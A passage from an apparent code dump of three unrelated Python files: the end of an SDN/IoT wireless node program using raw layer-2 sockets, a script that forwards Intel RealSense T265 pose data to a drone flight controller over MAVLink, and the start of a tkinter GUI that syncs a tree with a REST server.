class PriDataPlaneUnit(threading.Thread, NodeUtilities):
def __init__(self, macAdrs=None, pktBffr=b'\x41\xc8\x00\xff\xff\xff\xff'):
threading.Thread.__init__(self)
with self.cachLck :
_getVal = self.cache['nod']
if not macAdrs :
self.macAdrs = self.macAddressGetter(_getVal) # Node's MAC address
else :
self.macAdrs = macAdrs
self.pktBffr = pktBffr + macAdrs
return
# This class must contain generic topic and data sender and receiver
# [NOTE] Connection_request always belongs in control plane
# Random intra-domain communication handler
def run(self):
while True :
with self.sockLck :
pass
return
if __name__ == "__main__" :
_rootNodeThrd = None
# Creating a threading lock
_sockLck = threading.Lock()
_cachLck = threading.Lock()
# Temporary cache storage with limited capability of python dict
# [INFO] Keep key in 3 characters for fast processing
_cache = {
'nod': None, # Node number
# may be hold the counter value when its changed, if the change is recent process it
'ctr': {
'rcv': 1,
'rnk': {
'brd': 0,
'm_brd' : True
},
'con': {
'req': None,
'brd': None,
},
'pri': [],
'sdn': {
'nm' : False, # New message
'msg': '' # Actual message
},
},
'pav': {} # Dict of lower rank nodes
}
# Initialising an event object
_event_obj = threading.Event()
try:
_cache['nod'] = int(sys.argv[1])
except ValueError :
raise Exception("Incorrect value for number of nodes")
except IndexError :
raise Exception("No value for number of nodes")
# Create logging
logging.basicConfig(
filename='/home/priyan/code/sdn-iot-ip-icn/log/wpan{}.log'.
format(_cache['nod']),
filemode='a',
level=logging.WARNING,
format=("%(asctime)s-%(levelname)s-%(filename)s-%(lineno)d "
"%(message)s"),
datefmt='%d/%m/%Y %H:%M:%S'
)
try:
_cache['ctr']['con']['req'] = True if sys.argv[2] else None
logging.warning("Connection request ON")
except IndexError :
pass
try:
_cache['ctr']['con']['brd'] if sys.argv[3] == 'a' else False
logging.warning("AD HOC request ON")
except IndexError :
pass
# Creating a common layer 2 socket between control and data plane
l2_sock = socket.socket(family=socket.AF_PACKET, type=socket.SOCK_RAW, proto=socket.ntohs(0x0003))
l2_sock.bind(('wpan{}'.format(_cache['nod']), 0, socket.PACKET_BROADCAST)) # _cache['nod'] is the node ID number
l2_sock.setblocking(0)
logging.warning('l2_socket established')
_rootNodeThrd = RootNode(evntObj=_event_obj, cachLck=_cachLck, cache=_cache) if not _cache['nod'] else None
_ctlPlnThrd = PriCtrlPlaneUnit(evntObj=_event_obj, sockLck=_sockLck, macRwsk=l2_sock, cachLck=_cachLck, cache=_cache, rootNode=_rootNodeThrd)
try:
# we've created a class because in future we may have two separate sockets to
# deal with control and data packets separately
if _rootNodeThrd :
_rootNodeThrd.start()
logging.warning('Started Root Node...')
_ctlPlnThrd.start()
logging.warning('Started Control Plane...')
#datPlnThrd = priDataPlaneUnit(l2_sock)
#datPlnThrd.start()
#logging.warning('started data plane')
while True: # Without this hold up, the finally clause executes consecutively
_event_obj.clear()
time.sleep(TICK_TIME)
_event_obj.set()
finally:
l2_sock.close()
# Closing threads
if _rootNodeThrd :
_rootNodeThrd.join()
_ctlPlnThrd.join()
_thread.exit()
|
t265_to_mavlink.py
|
#!/usr/bin/env python3
#####################################################
## librealsense T265 to MAVLink ##
#####################################################
# This script assumes pyrealsense2.[].so file is found under the same directory as this script
# Install required packages:
# pip install pyrealsense2
# pip install transformations
# pip3 install dronekit
# pip3 install apscheduler
# Set the path for IDLE
import sys
sys.path.append("/usr/local/lib/")
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
# Import the libraries
import pyrealsense2 as rs
import numpy as np
import transformations as tf
import math as m
import time
import argparse
import threading
from time import sleep
from apscheduler.schedulers.background import BackgroundScheduler
from dronekit import connect, VehicleMode
from pymavlink import mavutil
#######################################
# Parameters
#######################################
# Default configurations for connection to the FCU
connection_string_default = '/dev/ttyUSB0'
connection_baudrate_default = 921600
connection_timeout_sec_default = 5
# Transformation to convert different camera orientations to NED convention. Replace camera_orientation_default for your configuration.
# 0: Forward, USB port to the right
# 1: Downfacing, USB port to the right
# 2: Forward, 45 degree tilted down
# Important note for downfacing camera: you need to tilt the vehicle's nose up a little - not flat - before you run the script, otherwise the initial yaw will be randomized, read here for more details: https://github.com/IntelRealSense/librealsense/issues/4080. Tilt the vehicle to any other sides and the yaw might not be as stable.
camera_orientation_default = 0
# https://mavlink.io/en/messages/common.html#VISION_POSITION_ESTIMATE
enable_msg_vision_position_estimate = True
vision_position_estimate_msg_hz_default = 30
# https://mavlink.io/en/messages/ardupilotmega.html#VISION_POSITION_DELTA
enable_msg_vision_position_delta = False
vision_position_delta_msg_hz_default = 30
# https://mavlink.io/en/messages/common.html#VISION_SPEED_ESTIMATE
enable_msg_vision_speed_estimate = True
vision_speed_estimate_msg_hz_default = 30
# https://mavlink.io/en/messages/common.html#STATUSTEXT
enable_update_tracking_confidence_to_gcs = True
update_tracking_confidence_to_gcs_hz_default = 1
# Default global position for EKF home/ origin
enable_auto_set_ekf_home = False
home_lat = 151269321 # Somewhere random
home_lon = 16624301 # Somewhere random
home_alt = 163000 # Somewhere random
# TODO: Taken care of by ArduPilot, so can be removed (once the handling on AP side is confirmed stable)
# In NED frame, offset from the IMU or the center of gravity to the camera's origin point
body_offset_enabled = 0
body_offset_x = 0 # In meters (m)
body_offset_y = 0 # In meters (m)
body_offset_z = 0 # In meters (m)
# Global scale factor, position x y z will be scaled up/down by this factor
scale_factor = 1.0
# Enable using yaw from compass to align north (zero degree is facing north)
compass_enabled = 0
# pose data confidence: 0x0 - Failed / 0x1 - Low / 0x2 - Medium / 0x3 - High
pose_data_confidence_level = ('FAILED', 'Low', 'Medium', 'High')
# lock for thread synchronization
lock = threading.Lock()
#######################################
# Global variables
#######################################
# FCU connection variables
vehicle = None
is_vehicle_connected = False
# Camera-related variables
pipe = None
pose_sensor = None
linear_accel_cov = 0.01
angular_vel_cov = 0.01
# Data variables
data = None
prev_data = None
H_aeroRef_aeroBody = None
V_aeroRef_aeroBody = None
heading_north_yaw = None
current_confidence_level = None
current_time_us = 0
# Increment everytime pose_jumping or relocalization happens
# See here: https://github.com/IntelRealSense/librealsense/blob/master/doc/t265.md#are-there-any-t265-specific-options
# For AP, a non-zero "reset_counter" would mean that we could be sure that the user's setup was using mavlink2
reset_counter = 1
#######################################
# Parsing user' inputs
#######################################
parser = argparse.ArgumentParser(description='Reboots vehicle')
parser.add_argument('--connect',
help="Vehicle connection target string. If not specified, a default string will be used.")
parser.add_argument('--baudrate', type=float,
help="Vehicle connection baudrate. If not specified, a default value will be used.")
parser.add_argument('--vision_position_estimate_msg_hz', type=float,
help="Update frequency for VISION_POSITION_ESTIMATE message. If not specified, a default value will be used.")
parser.add_argument('--vision_position_delta_msg_hz', type=float,
help="Update frequency for VISION_POSITION_DELTA message. If not specified, a default value will be used.")
parser.add_argument('--vision_speed_estimate_msg_hz', type=float,
help="Update frequency for VISION_SPEED_DELTA message. If not specified, a default value will be used.")
parser.add_argument('--scale_calib_enable', default=False, action='store_true',
help="Scale calibration. Only run while NOT in flight")
parser.add_argument('--camera_orientation', type=int,
help="Configuration for camera orientation. Currently supported: forward, usb port to the right - 0; downward, usb port to the right - 1, 2: forward tilted down 45deg")
parser.add_argument('--debug_enable',type=int,
help="Enable debug messages on terminal")
args = parser.parse_args()
connection_string = args.connect
connection_baudrate = args.baudrate
vision_position_estimate_msg_hz = args.vision_position_estimate_msg_hz
vision_position_delta_msg_hz = args.vision_position_delta_msg_hz
vision_speed_estimate_msg_hz = args.vision_speed_estimate_msg_hz
scale_calib_enable = args.scale_calib_enable
camera_orientation = args.camera_orientation
debug_enable = args.debug_enable
# Using default values if no specified inputs
if not connection_string:
connection_string = connection_string_default
print("INFO: Using default connection_string", connection_string)
else:
print("INFO: Using connection_string", connection_string)
if not connection_baudrate:
connection_baudrate = connection_baudrate_default
print("INFO: Using default connection_baudrate", connection_baudrate)
else:
print("INFO: Using connection_baudrate", connection_baudrate)
if not vision_position_estimate_msg_hz:
vision_position_estimate_msg_hz = vision_position_estimate_msg_hz_default
print("INFO: Using default vision_position_estimate_msg_hz", vision_position_estimate_msg_hz)
else:
print("INFO: Using vision_position_estimate_msg_hz", vision_position_estimate_msg_hz)
if not vision_position_delta_msg_hz:
vision_position_delta_msg_hz = vision_position_delta_msg_hz_default
print("INFO: Using default vision_position_delta_msg_hz", vision_position_delta_msg_hz)
else:
print("INFO: Using vision_position_delta_msg_hz", vision_position_delta_msg_hz)
if not vision_speed_estimate_msg_hz:
vision_speed_estimate_msg_hz = vision_speed_estimate_msg_hz_default
print("INFO: Using default vision_speed_estimate_msg_hz", vision_speed_estimate_msg_hz)
else:
print("INFO: Using vision_speed_estimate_msg_hz", vision_speed_estimate_msg_hz)
if body_offset_enabled == 1:
print("INFO: Using camera position offset: Enabled, x y z is", body_offset_x, body_offset_y, body_offset_z)
else:
print("INFO: Using camera position offset: Disabled")
if compass_enabled == 1:
print("INFO: Using compass: Enabled. Heading will be aligned to north.")
else:
print("INFO: Using compass: Disabled")
if scale_calib_enable == True:
print("\nINFO: SCALE CALIBRATION PROCESS. DO NOT RUN DURING FLIGHT.\nINFO: TYPE IN NEW SCALE IN FLOATING POINT FORMAT\n")
else:
if scale_factor == 1.0:
print("INFO: Using default scale factor", scale_factor)
else:
print("INFO: Using scale factor", scale_factor)
if not camera_orientation:
camera_orientation = camera_orientation_default
print("INFO: Using default camera orientation", camera_orientation)
else:
print("INFO: Using camera orientation", camera_orientation)
if camera_orientation == 0: # Forward, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.linalg.inv(H_aeroRef_T265Ref)
elif camera_orientation == 1: # Downfacing, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.array([[0,1,0,0],[1,0,0,0],[0,0,-1,0],[0,0,0,1]])
elif camera_orientation == 2: # 45degree forward
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = (tf.euler_matrix(m.pi/4, 0, 0)).dot(np.linalg.inv(H_aeroRef_T265Ref))
else: # Default is facing forward, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.linalg.inv(H_aeroRef_T265Ref)
if not debug_enable:
debug_enable = 0
else:
debug_enable = 1
np.set_printoptions(precision=4, suppress=True) # Format output on terminal
print("INFO: Debug messages enabled.")
#######################################
# Functions
#######################################
# https://mavlink.io/en/messages/common.html#VISION_POSITION_ESTIMATE
def send_vision_position_estimate_message():
global is_vehicle_connected, current_time_us, H_aeroRef_aeroBody, reset_counter
with lock:
if is_vehicle_connected == True and H_aeroRef_aeroBody is not None:
# Setup angle data
rpy_rad = np.array( tf.euler_from_matrix(H_aeroRef_aeroBody, 'sxyz'))
# Setup covariance data, which is the upper right triangle of the covariance matrix, see here: https://files.gitter.im/ArduPilot/VisionProjects/1DpU/image.png
# Attemp #01: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = linear_accel_cov * pow(10, 3 - int(data.tracker_confidence))
cov_twist = angular_vel_cov * pow(10, 1 - int(data.tracker_confidence))
covariance = np.array([cov_pose, 0, 0, 0, 0, 0,
cov_pose, 0, 0, 0, 0,
cov_pose, 0, 0, 0,
cov_twist, 0, 0,
cov_twist, 0,
cov_twist])
# Setup the message to be sent
msg = vehicle.message_factory.vision_position_estimate_encode(
current_time_us, # us Timestamp (UNIX time or time since system boot)
H_aeroRef_aeroBody[0][3], # Global X position
H_aeroRef_aeroBody[1][3], # Global Y position
H_aeroRef_aeroBody[2][3], # Global Z position
rpy_rad[0], # Roll angle
rpy_rad[1], # Pitch angle
rpy_rad[2], # Yaw angle
covariance, # Row-major representation of pose 6x6 cross-covariance matrix
reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# https://mavlink.io/en/messages/ardupilotmega.html#VISION_POSITION_DELTA
def send_vision_position_delta_message():
global is_vehicle_connected, current_time_us, current_confidence_level, H_aeroRef_aeroBody
with lock:
if is_vehicle_connected == True and H_aeroRef_aeroBody is not None:
# Calculate the deltas in position, attitude and time from the previous to current orientation
H_aeroRef_PrevAeroBody = send_vision_position_delta_message.H_aeroRef_PrevAeroBody
H_PrevAeroBody_CurrAeroBody = (np.linalg.inv(H_aeroRef_PrevAeroBody)).dot(H_aeroRef_aeroBody)
delta_time_us = current_time_us - send_vision_position_delta_message.prev_time_us
delta_position_m = [H_PrevAeroBody_CurrAeroBody[0][3], H_PrevAeroBody_CurrAeroBody[1][3], H_PrevAeroBody_CurrAeroBody[2][3]]
delta_angle_rad = np.array( tf.euler_from_matrix(H_PrevAeroBody_CurrAeroBody, 'sxyz'))
# Send the message
msg = vehicle.message_factory.vision_position_delta_encode(
current_time_us, # us: Timestamp (UNIX time or time since system boot)
delta_time_us, # us: Time since last reported camera frame
delta_angle_rad, # float[3] in radian: Defines a rotation vector in body frame that rotates the vehicle from the previous to the current orientation
delta_position_m, # float[3] in m: Change in position from previous to current frame rotated into body frame (0=forward, 1=right, 2=down)
current_confidence_level # Normalized confidence value from 0 to 100.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Save static variables
send_vision_position_delta_message.H_aeroRef_PrevAeroBody = H_aeroRef_aeroBody
send_vision_position_delta_message.prev_time_us = current_time_us
# https://mavlink.io/en/messages/common.html#VISION_SPEED_ESTIMATE
def send_vision_speed_estimate_message():
global is_vehicle_connected, current_time_us, V_aeroRef_aeroBody, reset_counter
with lock:
if is_vehicle_connected == True and V_aeroRef_aeroBody is not None:
# Attemp #01: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = linear_accel_cov * pow(10, 3 - int(data.tracker_confidence))
covariance = np.array([cov_pose, 0, 0,
0, cov_pose, 0,
0, 0, cov_pose])
# Setup the message to be sent
msg = vehicle.message_factory.vision_speed_estimate_encode(
current_time_us, # us Timestamp (UNIX time or time since system boot)
V_aeroRef_aeroBody[0][3], # Global X speed
V_aeroRef_aeroBody[1][3], # Global Y speed
V_aeroRef_aeroBody[2][3], # Global Z speed
covariance, # covariance
reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Update the changes of confidence level on GCS and terminal
def update_tracking_confidence_to_gcs():
if update_tracking_confidence_to_gcs.prev_confidence_level != data.tracker_confidence:
confidence_status_string = 'Tracking confidence: ' + pose_data_confidence_level[data.tracker_confidence]
send_msg_to_gcs(confidence_status_string)
update_tracking_confidence_to_gcs.prev_confidence_level = data.tracker_confidence
# https://mavlink.io/en/messages/common.html#STATUSTEXT
def send_msg_to_gcs(text_to_be_sent):
# MAV_SEVERITY: 0=EMERGENCY 1=ALERT 2=CRITICAL 3=ERROR, 4=WARNING, 5=NOTICE, 6=INFO, 7=DEBUG, 8=ENUM_END
# Defined here: https://mavlink.io/en/messages/common.html#MAV_SEVERITY
# MAV_SEVERITY = 3 will let the message be displayed on Mission Planner HUD, but 6 is ok for QGroundControl
if is_vehicle_connected == True:
text_msg = 'T265: ' + text_to_be_sent
status_msg = vehicle.message_factory.statustext_encode(
6, # MAV_SEVERITY
text_msg.encode() # max size is char[50]
)
vehicle.send_mavlink(status_msg)
vehicle.flush()
print("INFO: " + text_to_be_sent)
else:
print("INFO: Vehicle not connected. Cannot send text message to Ground Control Station (GCS)")
# Send a mavlink SET_GPS_GLOBAL_ORIGIN message (http://mavlink.org/messages/common#SET_GPS_GLOBAL_ORIGIN), which allows us to use local position information without a GPS.
def set_default_global_origin():
if is_vehicle_connected == True:
msg = vehicle.message_factory.set_gps_global_origin_encode(
int(vehicle._master.source_system),
home_lat,
home_lon,
home_alt
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Send a mavlink SET_HOME_POSITION message (http://mavlink.org/messages/common#SET_HOME_POSITION), which allows us to use local position information without a GPS.
def set_default_home_position():
if is_vehicle_connected == True:
x = 0
y = 0
z = 0
q = [1, 0, 0, 0] # w x y z
approach_x = 0
approach_y = 0
approach_z = 1
msg = vehicle.message_factory.set_home_position_encode(
int(vehicle._master.source_system),
home_lat,
home_lon,
home_alt,
x,
y,
z,
q,
approach_x,
approach_y,
approach_z
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Request a timesync update from the flight controller, for future work.
# TODO: Inspect the usage of timesync_update
def update_timesync(ts=0, tc=0):
if ts == 0:
ts = int(round(time.time() * 1000))
msg = vehicle.message_factory.timesync_encode(
tc, # tc1
ts # ts1
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Listen to attitude data to acquire heading when compass data is enabled
def att_msg_callback(self, attr_name, value):
global heading_north_yaw
if heading_north_yaw is None:
heading_north_yaw = value.yaw
print("INFO: Received first ATTITUDE message with heading yaw", heading_north_yaw * 180 / m.pi, "degrees")
else:
heading_north_yaw = value.yaw
print("INFO: Received ATTITUDE message with heading yaw", heading_north_yaw * 180 / m.pi, "degrees")
def vehicle_connect():
global vehicle, is_vehicle_connected
try:
vehicle = connect(connection_string, wait_ready = True, baud = connection_baudrate, source_system = 1)
except:
print('Connection error! Retrying...')
sleep(1)
if vehicle == None:
is_vehicle_connected = False
return False
else:
is_vehicle_connected = True
return True
# List of notification events: https://github.com/IntelRealSense/librealsense/blob/development/include/librealsense2/h/rs_types.h
# List of notification API: https://github.com/IntelRealSense/librealsense/blob/development/common/notifications.cpp
def realsense_notification_callback(notif):
global reset_counter
print("INFO: T265 event: " + notif)
if notif.get_category() is rs.notification_category.pose_relocalization:
reset_counter += 1
send_msg_to_gcs('Relocalization detected')
def realsense_connect():
global pipe, pose_sensor
# Declare RealSense pipeline, encapsulating the actual device and sensors
pipe = rs.pipeline()
# Build config object before requesting data
cfg = rs.config()
# Enable the stream we are interested in
cfg.enable_stream(rs.stream.pose) # Positional data
# Configure callback for relocalization event
device = cfg.resolve(pipe).get_device()
pose_sensor = device.first_pose_sensor()
pose_sensor.set_notifications_callback(realsense_notification_callback)
# Start streaming with requested config
pipe.start(cfg)
# Monitor user input from the terminal and perform action accordingly
def user_input_monitor():
global scale_factor
while True:
# Special case: updating scale
if scale_calib_enable == True:
scale_factor = float(input("INFO: Type in new scale as float number\n"))
print("INFO: New scale is ", scale_factor)
if enable_auto_set_ekf_home:
send_msg_to_gcs('Set EKF home with default GPS location')
set_default_global_origin()
set_default_home_position()
time.sleep(1) # Wait a short while for FCU to start working
# Add new action here according to the key pressed.
# Enter: Set EKF home when user press enter
try:
c = input()
if c == "":
send_msg_to_gcs('Set EKF home with default GPS location')
set_default_global_origin()
set_default_home_position()
else:
print("Got keyboard input", c)
except IOError: pass
#######################################
# Main code starts here
#######################################
print("INFO: Connecting to vehicle.")
while (not vehicle_connect()):
pass
print("INFO: Vehicle connected.")
send_msg_to_gcs('Connecting to camera...')
realsense_connect()
send_msg_to_gcs('Camera connected.')
if compass_enabled == 1:
# Listen to the attitude data in aeronautical frame
vehicle.add_message_listener('ATTITUDE', att_msg_callback)
# Send MAVlink messages in the background at pre-determined frequencies
sched = BackgroundScheduler()
if enable_msg_vision_position_estimate:
sched.add_job(send_vision_position_estimate_message, 'interval', seconds = 1/vision_position_estimate_msg_hz)
if enable_msg_vision_position_delta:
sched.add_job(send_vision_position_delta_message, 'interval', seconds = 1/vision_position_delta_msg_hz)
send_vision_position_delta_message.H_aeroRef_PrevAeroBody = tf.quaternion_matrix([1,0,0,0])
send_vision_position_delta_message.prev_time_us = int(round(time.time() * 1000000))
if enable_msg_vision_speed_estimate:
sched.add_job(send_vision_speed_estimate_message, 'interval', seconds = 1/vision_speed_estimate_msg_hz)
if enable_update_tracking_confidence_to_gcs:
sched.add_job(update_tracking_confidence_to_gcs, 'interval', seconds = 1/update_tracking_confidence_to_gcs_hz_default)
update_tracking_confidence_to_gcs.prev_confidence_level = -1
# A separate thread to monitor user input
user_keyboard_input_thread = threading.Thread(target=user_input_monitor)
user_keyboard_input_thread.daemon = True
user_keyboard_input_thread.start()
sched.start()
if compass_enabled == 1:
time.sleep(1) # Wait a short while for yaw to be correctly initiated
send_msg_to_gcs('Sending vision messages to FCU')
print("INFO: Press Enter to set EKF home at default location")
try:
while True:
# Monitor last_heartbeat to reconnect in case of lost connection
if vehicle.last_heartbeat > connection_timeout_sec_default:
is_vehicle_connected = False
print("WARNING: CONNECTION LOST. Last hearbeat was %f sec ago."% vehicle.last_heartbeat)
print("WARNING: Attempting to reconnect ...")
vehicle_connect()
continue
# Wait for the next set of frames from the camera
frames = pipe.wait_for_frames()
# Fetch pose frame
pose = frames.get_pose_frame()
# Process data
if pose:
with lock:
# Store the timestamp for MAVLink messages
current_time_us = int(round(time.time() * 1000000))
# Pose data consists of translation and rotation
data = pose.get_pose_data()
# Confidence level value from T265: 0-3, remapped to 0 - 100: 0% - Failed / 33.3% - Low / 66.6% - Medium / 100% - High
current_confidence_level = float(data.tracker_confidence * 100 / 3)
# In transformations, Quaternions w+ix+jy+kz are represented as [w, x, y, z]!
H_T265Ref_T265body = tf.quaternion_matrix([data.rotation.w, data.rotation.x, data.rotation.y, data.rotation.z])
H_T265Ref_T265body[0][3] = data.translation.x * scale_factor
H_T265Ref_T265body[1][3] = data.translation.y * scale_factor
H_T265Ref_T265body[2][3] = data.translation.z * scale_factor
# Transform to aeronautic coordinates (body AND reference frame!)
H_aeroRef_aeroBody = H_aeroRef_T265Ref.dot( H_T265Ref_T265body.dot( H_T265body_aeroBody))
# Calculate GLOBAL XYZ speed (speed from T265 is already GLOBAL)
V_aeroRef_aeroBody = tf.quaternion_matrix([1,0,0,0])
V_aeroRef_aeroBody[0][3] = data.velocity.x
V_aeroRef_aeroBody[1][3] = data.velocity.y
V_aeroRef_aeroBody[2][3] = data.velocity.z
V_aeroRef_aeroBody = H_aeroRef_T265Ref.dot(V_aeroRef_aeroBody)
# Check for pose jump and increment reset_counter
if prev_data != None:
delta_translation = [data.translation.x - prev_data.translation.x, data.translation.y - prev_data.translation.y, data.translation.z - prev_data.translation.z]
position_displacement = np.linalg.norm(delta_translation)
# Pose jump is indicated when position changes abruptly. The behavior is not well documented yet (as of librealsense 2.34.0)
jump_threshold = 0.1 # in meters, from trials and errors, should be relative to how frequent is the position data obtained (200Hz for the T265)
if (position_displacement > jump_threshold):
send_msg_to_gcs('Pose jump detected')
print("Position jumped by: ", position_displacement)
reset_counter += 1
prev_data = data
# Take offsets from body's center of gravity (or IMU) to camera's origin into account
if body_offset_enabled == 1:
H_body_camera = tf.euler_matrix(0, 0, 0, 'sxyz')
H_body_camera[0][3] = body_offset_x
H_body_camera[1][3] = body_offset_y
H_body_camera[2][3] = body_offset_z
H_camera_body = np.linalg.inv(H_body_camera)
H_aeroRef_aeroBody = H_body_camera.dot(H_aeroRef_aeroBody.dot(H_camera_body))
# Realign heading to face north using initial compass data
if compass_enabled == 1:
H_aeroRef_aeroBody = H_aeroRef_aeroBody.dot( tf.euler_matrix(0, 0, heading_north_yaw, 'sxyz'))
# Show debug messages here
if debug_enable == 1:
os.system('clear') # This helps in displaying the messages to be more readable
print("DEBUG: Raw RPY[deg]: {}".format( np.array( tf.euler_from_matrix( H_T265Ref_T265body, 'sxyz')) * 180 / m.pi))
print("DEBUG: NED RPY[deg]: {}".format( np.array( tf.euler_from_matrix( H_aeroRef_aeroBody, 'sxyz')) * 180 / m.pi))
print("DEBUG: Raw pos xyz : {}".format( np.array( [data.translation.x, data.translation.y, data.translation.z])))
print("DEBUG: NED pos xyz : {}".format( np.array( tf.translation_from_matrix( H_aeroRef_aeroBody))))
except KeyboardInterrupt:
send_msg_to_gcs('Closing the script...')
except:
send_msg_to_gcs('ERROR IN SCRIPT')
print("Unexpected error:", sys.exc_info()[0])
finally:
pipe.stop()
vehicle.close()
print("INFO: Realsense pipeline and vehicle object closed.")
sys.exit()
|
main_window.py
|
from tkinter import *
from tkinter import ttk
import uuid
import requests
import json
import threading
from popup_window import PopupWindow
from events import EventsManager, AddEvent, DeleteEvent, EditEvent
server = 'https://treedb.herokuapp.com/'
# server = 'http://127.0.0.1:8080/'
def run_in_thread(fn):
def run(*k, **kw):
thread = threading.Thread(target=fn, args=k, kwargs=kw)
thread.start()
return thread
return run
def get_all_tree():
r = requests.get(server + 'tree')
return json.loads(r.text)['tree']
def get_node(node_id):
r = requests.get(server + 'tree/' + str(node_id))
return json.loads(r.text)
def update(tree):
r = requests.post(server + 'tree/update/', json=tree)
return json.loads(r.text)['tree']
def update_events(events):
r = requests.post(server + 'tree/update/events/', json=events)
return json.loads(r.text)['nodes']
class MainWindow(object):
db_tree_data = list()
cached_tree_data = list()
entry_window = object
def __init__(self, root):
self.events_manager = EventsManager()
self.root = root
# Base layer
self.cachedTreeFrame = ttk.Frame(root, borderwidth=2, relief=GROOVE)
self.cachedTreeFrame.grid(row=0, column=0, sticky=W+N+E+S)
self.dbTreeFrame = ttk.Frame(root, borderwidth=2, relief=GROOVE)
self.dbTreeFrame.grid(row=0, column=2, sticky=N+W+E+S)
self.buttonsFrame = ttk.Frame(root, borderwidth=2)
self.buttonsFrame.grid(row=1, column=0, sticky=W)
# Buttons
self.buttonsFrame.addButton = ttk.Button(self.buttonsFrame, text='+', command=self.add_node)
self.buttonsFrame.addButton.grid(row=1, column=1)
self.buttonsFrame.getButton = ttk.Button(self.root, text='<<<', command=self.get_node_from_db)
self.buttonsFrame.getButton.grid(row=0, column=1)
self.buttonsFrame.deleteButton = ttk.Button(self.buttonsFrame, text='-', command=self.delete_node)
self.buttonsFrame.deleteButton.grid(row=1, column=2)
self.buttonsFrame.resetButton = ttk.Button(self.buttonsFrame, text='Reset', command=self.reset)
self.buttonsFrame.resetButton.grid(row=2, column=3)
self.buttonsFrame.editButton = ttk.Button(self.buttonsFrame, text='Edit', command=self.edit)
self.buttonsFrame.editButton.grid(row=1, column=3)
self.buttonsFrame.applyButton = ttk.Button(self.buttonsFrame, text='Apply', command=self.apply)
self.buttonsFrame.applyButton.grid(row=2, column=1)
self.buttonsFrame.applyEventsButton = ttk.Button(self.buttonsFrame, text='Apply events', command=self.apply_events)
# self.buttonsFrame.applyEventsButton.grid(row=3, column=1)
# Trees
self.cachedTreeFrame.cachedTree = ttk.Treeview(self.cachedTreeFrame)
self.cachedTreeFrame.cachedTree.heading('#0', text='Cached tree')
self.cachedTreeFrame.cachedTree.pack(fill=BOTH, expand=1)
self.dbTreeFrame.dbTree = ttk.Treeview(self.dbTreeFrame)
self.dbTreeFrame.dbTree.heading('#0', text='Database tree')
self.dbTreeFrame.dbTree.pack(fill=BOTH, expand=1)
# Initialize
self.root.after(1000, self.load_db_data)
def popup(self, node_name):
self.entry_window = PopupWindow(self.root, node_name)
self.buttonsFrame.addButton["state"] = "disabled"
self.root.wait_window(self.entry_window.top)
self.buttonsFrame.addButton["state"] = "normal"
@run_in_thread
def load_db_data(self):
requests.get(server + 'tree/clear')
with open('testdb.json') as data_file:
data = json.load(data_file)
update([data])
self.db_tree_data = get_all_tree()
self.redraw_db()
def _redraw(self, subtree, widget_tree):
"""
Clear tree and render
:param subtree:
:param widget_tree:
:return:
"""
for i in widget_tree.get_children():
widget_tree.delete(i)
self.render_tree(subtree, widget_tree)
def redraw_cached(self):
self._redraw(self.cached_tree_data, self.cachedTreeFrame.cachedTree)
def redraw_db(self):
self._redraw(self.db_tree_data, self.dbTreeFrame.dbTree)
def render_tree(self, subtree, widget_tree, root_node_uuid=""):
"""
Render tree
:param subtree:
:param widget_tree:
:type widget_tree: ttk.Treeview
:param root_node_uuid:
:return:
"""
for child in subtree:
if 'uuid' not in child:
child['uuid'] = str(uuid.uuid4())
node = child['node']
tag = 'normal' if node['deleted'] else 'deleted'
if child['node']['id'] is None:
child['node']['id'] = child['uuid']
child['new'] = True
widget_tree.insert(
root_node_uuid,
0,
child["uuid"],
text=node['name'], # + " - " + child['uuid'] + " - " + str(child['node']['id']),
values=child["uuid"],
open=True,
tag=tag)
widget_tree.tag_configure('deleted', font='Times 10 normal')
widget_tree.tag_configure('normal', font='Times 10 italic')
widget_tree = self.render_tree(child['children'], widget_tree, root_node_uuid=child["uuid"])
return widget_tree
def append_to_cache(self, node):
rnid = node['root']
nid = node['id']
children = list()
to_delete = list()
for child in self.cached_tree_data:
if child['node']['root'] == nid and child['node']['root'] is not None:
to_delete.append(child)
children.append(child)
for ditem in to_delete:
self.cached_tree_data.pop(self.cached_tree_data.index(ditem))
if nid is not None and self.find_node_data_by_id(nid, self.cached_tree_data) is not None:
return
cached_root_node = self.find_node_data_by_id(rnid, self.cached_tree_data)
if cached_root_node:
cached_root_node['children'].append({'node': node, 'children': children})
if cached_root_node['node']['deleted'] and not node['deleted']:
self.delete_subtree({'node': node, 'children': children})
else:
self.cached_tree_data.append({'node': node, 'children': children})
self.redraw_cached()
def find_node_data_by_uuid(self, node_uuid, subtree):
res = None
for child in subtree:
if child['uuid'] == node_uuid:
res = child
break
else:
res = self.find_node_data_by_uuid(node_uuid, child['children'])
if res is not None:
break
return res
def find_node_data_by_id(self, node_id, subtree):
res = None
for child in subtree:
if child['node']['id'] == node_id:
res = child
break
else:
res = self.find_node_data_by_id(node_id, child['children'])
if res is not None:
break
return res
def node_exists(self, node_id, subtree):
"""
Check if node exists in tree
:param node_id:
:param subtree:
:return:
"""
return False if self.find_node_data_by_id(node_id, subtree) is None else True
def delete_subtree(self, node):
node['node']['deleted'] = True
res = dict()
res['node'] = node['node']
res['children'] = list()
for child in node['children']:
if not child['node']['deleted']:
res['children'].append(self.delete_subtree(child))
return res
def add_node(self):
